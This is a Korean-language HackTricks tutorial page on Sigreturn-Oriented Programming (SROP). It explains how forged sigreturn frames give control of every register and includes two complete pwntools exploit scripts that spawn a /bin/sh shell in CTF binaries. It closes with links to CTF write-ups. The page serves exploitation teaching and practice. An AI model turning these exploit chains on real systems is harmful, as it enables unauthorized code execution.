SROP - Sigreturn-Oriented Programming

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Basic Information

**Sigreturn**는 주로 신호 처리기가 실행을 완료한 후 정리하는 데 사용되는 특별한 syscall입니다. 신호는 운영 체제가 프로그램에 보내는 중단으로, 종종 예외적인 상황이 발생했음을 나타냅니다. 프로그램이 신호를 받으면, 신호 처리기라는 신호를 처리하기 위해 설계된 특별한 함수로 신호를 처리하기 위해 현재 작업을 일시 중지합니다.

신호 처리기가 끝난 후, 프로그램은 이전 상태로 복귀해야 합니다. 이때 **sigreturn**이 작용합니다. 이는 프로그램이 신호 처리기에서 반환하고 신호 처리기에 의해 사용된 스택 프레임(함수 호출 및 지역 변수를 저장하는 메모리 섹션)을 정리하여 프로그램의 상태를 복원하는 데 도움을 줍니다.

흥미로운 점은 **sigreturn**이 프로그램의 상태를 복원하는 방법입니다: 이는 모든 CPU의 레지스터 값을 스택에 저장함으로써 이루어집니다. 신호가 더 이상 차단되지 않으면, sigreturn은 이 값을 스택에서 팝하여 CPU의 레지스터를 신호가 처리되기 전의 상태로 효과적으로 재설정합니다. 여기에는 현재 스택의 맨 위를 가리키는 스택 포인터 레지스터(RSP)가 포함됩니다.

Caution

ROP 체인에서 sigreturn syscall을 호출하고 로드하고자 하는 레지스터 값을 스택에 추가하면 모든 레지스터 값을 제어할 수 있으며, 따라서 예를 들어 execve syscall을 /bin/sh로 호출할 수 있습니다.

이것이 다른 Ret2syscall을 호출하기 위한 매개변수를 제어하는 것을 훨씬 쉽게 만드는 Ret2syscall의 일종이라는 점에 유의하십시오:

Ret2syscall

궁금하다면, 이는 나중에 값을 복구하기 위해 스택에 저장된 sigcontext 구조체입니다 (다이어그램은 여기에서 확인할 수 있습니다):

+--------------------+--------------------+
| rt_sigeturn()      | uc_flags           |
+--------------------+--------------------+
| &uc                | uc_stack.ss_sp     |
+--------------------+--------------------+
| uc_stack.ss_flags  | uc.stack.ss_size   |
+--------------------+--------------------+
| r8                 | r9                 |
+--------------------+--------------------+
| r10                | r11                |
+--------------------+--------------------+
| r12                | r13                |
+--------------------+--------------------+
| r14                | r15                |
+--------------------+--------------------+
| rdi                | rsi                |
+--------------------+--------------------+
| rbp                | rbx                |
+--------------------+--------------------+
| rdx                | rax                |
+--------------------+--------------------+
| rcx                | rsp                |
+--------------------+--------------------+
| rip                | eflags             |
+--------------------+--------------------+
| cs / gs / fs       | err                |
+--------------------+--------------------+
| trapno             | oldmask (unused)   |
+--------------------+--------------------+
| cr2 (segfault addr)| &fpstate           |
+--------------------+--------------------+
| __reserved         | sigmask            |
+--------------------+--------------------+

더 나은 설명을 위해 다음도 확인하세요:

- YouTube

예시

여기에서 ROP를 통해 signeturn 호출이 구성되는 예시를 찾을 수 있습니다 (rxa에 값 0xf를 넣음), 비록 이것이 최종 익스플로잇입니다:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015

frame = SigreturnFrame()
frame.rax = 0x3b            # syscall number for execve
frame.rdi = BINSH           # pointer to /bin/sh
frame.rsi = 0x0             # NULL
frame.rdx = 0x0             # NULL
frame.rip = SYSCALL_RET

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)         # 0xf is the number of the syscall sigreturn
payload += p64(SYSCALL_RET)
payload += bytes(frame)

p.sendline(payload)
p.interactive()

또한 여기서 익스플로잇을 확인하세요. 여기서 바이너리는 이미 sigreturn을 호출하고 있으므로 ROP를 구축할 필요가 없습니다.

from pwn import *

# Establish the target
target = process("./small_boi")
#gdb.attach(target, gdbscript = 'b *0x40017c')
#target = remote("pwn.chal.csaw.io", 1002)

# Establish the target architecture
context.arch = "amd64"

# Establish the address of the sigreturn function
sigreturn = p64(0x40017c)

# Start making our sigreturn frame
frame = SigreturnFrame()

frame.rip = 0x400185 # Syscall instruction
frame.rax = 59       # execve syscall
frame.rdi = 0x4001ca # Address of "/bin/sh"
frame.rsi = 0x0      # NULL
frame.rdx = 0x0      # NULL

payload = "0"*0x28 # Offset to return address
payload += sigreturn # Function with sigreturn
payload += str(frame)[8:] # Our sigreturn frame, adjusted for the 8 byte return shift of the stack

target.sendline(payload) # Send the target payload

# Drop to an interactive shell
target.interactive()

다른 예제 및 참고자료

https://youtu.be/ADULSwnQs-s?feature=shared
https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop
https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html
스택에 쓰기를 허용하고 sigreturn 시스템 호출을 호출하는 어셈블리 바이너리. sigreturn 구조체를 통해 스택에 ret2syscall을 쓸 수 있으며, 바이너리의 메모리 안에 있는 플래그를 읽을 수 있습니다.
https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html
스택에 쓰기를 허용하고 sigreturn 시스템 호출을 호출하는 어셈블리 바이너리. sigreturn 구조체를 통해 스택에 ret2syscall을 쓸 수 있으며, (바이너리는 /bin/sh 문자열을 포함하고 있습니다).
https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html
64비트, relro 없음, canary 없음, nx, pie 없음. gets 함수의 단순한 버퍼 오버플로우로 ret2syscall을 수행하는 가젯이 부족합니다. ROP 체인은 /bin/sh를 .bss에 쓰고, 다시 gets를 호출하여 alarm 함수를 악용하여 eax를 0xf로 설정하여 SROP를 호출하고 셸을 실행합니다.
https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html
64비트 어셈블리 프로그램, relro 없음, canary 없음, nx, pie 없음. 흐름은 스택에 쓰고 여러 레지스터를 제어하며 시스템 호출을 호출한 후 exit를 호출할 수 있게 합니다. 선택된 시스템 호출은 sigreturn으로, 레지스터를 설정하고 eip를 이전 시스템 호출 명령어를 호출하도록 이동시켜 memprotect를 실행하여 바이너리 공간을 rwx로 설정하고 ESP를 바이너리 공간에 설정합니다. 흐름을 따라 프로그램은 ESP에 다시 읽기를 호출하지만, 이 경우 ESP는 다음 명령어를 가리키게 되어 셸코드를 다음 명령어로 쓰고 실행합니다.
https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection
SROP는 셸코드가 배치된 위치에 실행 권한(mempprotect)을 부여하는 데 사용됩니다.

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.